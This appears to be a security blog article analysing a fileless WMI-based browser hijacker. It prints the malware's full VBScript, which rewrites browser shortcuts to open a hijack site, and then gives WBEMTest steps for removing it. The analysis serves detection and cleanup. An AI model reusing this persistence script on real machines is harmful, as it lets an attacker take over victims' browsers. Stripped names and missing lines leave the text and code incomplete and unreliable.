A fileless infection using WMI to hijack your Browser

Share this…

Windows comes with a tool called the Windows Management Instrumentation, or WMI, that can be used by system administrators to receive information and notifications from Windows. Using WMI, an administrator can pretty much query any Windows information including what programs are installed, storage use on a hard drive, or monitor a folder for changes. The WMI can also be used to launch VBScript or PowerShell scripts when a particular event occurs, such as when a file is created or some other system event has occurred. Unfortunately, this last feature can also be used by malware developers for more nefarious reasons such as creating fileless infectors. utilizes the WMI to hijack your browser shortcuts

Today, Djordje Lukic, a malware analyst for Zemana, reached out to me to let me know about a new fileless browser hijacker called and provided me a sample of the installer. This hijacker infects a victim’s browser shortcuts by adding as an argument to the executable.This would cause the, or TopYea, site to open automatically when the browser starts. 

Hijacked Internet Explorer shortcut
Hijacked Internet Explorer shortcut

 As you can see from the shortcut,  Internet Explorer is executed with the argument of, which would cause that homepage to automatically display when Internet Explorer starts.

The malware works by registering itself as an instance of the ActiveScriptEventConsumer class in the ROOT\subscription namespace.  This instance will be named ASEC and contain a VBScript script that will execute every 10 seconds. When executed, it will infect your browser’s shortcuts so that they open when started. You can see this configured instance in the screenshot of WMI Explorer below.

WMI Explorer showing the Malware VBScript
WMI Explorer showing the Malware VBScript

The VBScript that will be executed is:

Dim objFS
Set objFS = CreateObject("Scripting.FileSystemObject")
On Error Resume Next
Const link = ""
browsers = Array("IEXPLORE.EXE", "chrome.exe", "firefox.exe", "360chrome.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe")
Set BrowserDic = CreateObject("scripting.dictionary")
For Each browser In browsers
	BrowserDic.Add LCase(browser), browser
Dim FoldersDic(12)
Set WshShell = CreateObject("Wscript.Shell")
FoldersDic(0) = "C:\Users\Public\Desktop"
FoldersDic(1) = "C:\ProgramData\Microsoft\Windows\Start Menu"
FoldersDic(2) = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs"
FoldersDic(3) = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
FoldersDic(4) = "C:\Users\User\Desktop"
FoldersDic(5) = "C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu"
FoldersDic(6) = "C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"
FoldersDic(7) = "C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
FoldersDic(8) = "C:\Users\User\AppData\Roaming\Roaming"
FoldersDic(9) = "C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch"
FoldersDic(10) = "C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu"
FoldersDic(11) = "C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar"
Set fso = CreateObject("Scripting.Filesystemobject")
For i = 0 To UBound(FoldersDic)
	For Each file In fso.GetFolder(FoldersDic(i)).Files
		If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
			set oShellLink = WshShell.CreateShortcut(file.Path)
			path = oShellLink.TargetPath
			name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
			If BrowserDic.Exists(LCase(name)) Then
				oShellLink.Arguments = link
				If file.Attributes And 1 Then
					file.Attributes = file.Attributes - 1
				End If
			End If
		End If
createobject("").run "cmd /c taskkill /f /im scrcons.exe", 0

When executed, the script will target and infect the shortcuts for the following web browsers:

Targeted Web Browsers
Internet Explorer Chrome Firefox
360 Chrome Sogou Explorer Opera
Safari Maxthon QQ Browser
Baidu Browser TheWorld Browser Liebao
Tencent Traveler    

Since this infection’s installer deletes itself when run, does not create any files on the hard drive, and only resides in the WMI, most anti-malware and antivirus vendors would not be able to detect it. In order to target this infection, Zemana has introduced this technology into their scanner so that it can view and remove these types of malicious WMI instances.  

For those who are infected with the or TopYeah browser hijacker, we have a guide that can automate the removal process here: How to remove the and TopYea Browser Hijacker. For those who wish to learn how to remove it manually, you can read the next section.

How to manually remove the infection script from WMI

If you wish to remove the and TopYea infection, the easiest method is to use a program like Zemana.  If you wish to remove this infection manually, though, you will need to use WBEMTest to delete the registered instance.

When starting WBEMTest we need to run it with administrator privileges. To do this, right click on the C:\Windows\System32\wbemtest.exe executable and then select Run as Administrator.  WBEMTest will now start and you will see its main screen as shown below.


Now click on the Connect and in the Namespace field enter root\subscription as shown in the image below.

Connect to Namespace
Connect to Namespace

Now click on the Connect button. You will now be at the main WBEMTest options screen for the root\subscription namespace as shown below.

Subscription Namespace
Subscription Namespace

Now put a checkmark in the Enable All Privileges checkbox and click on the Enum Instancesbutton. This will open up a dialog box where it asks you to type in the name of the instance you wish to connect to.

Class Info Dialog Box
Class Info Dialog Box

In the above field, enter ActiveScriptEventConsumer and then press the OK button. You will now be at a page that lists all instances found for that superclass.  

Query Result
Query Result

Look through the list of instances, and if you see one called ASEC, left-click on it once to select it.  Then click on the Delete button.

The malicious event handler will now be removed from the WMI and you can use a tool like Shortcut Cleaner to clean your shortcuts of the and TopYea infection.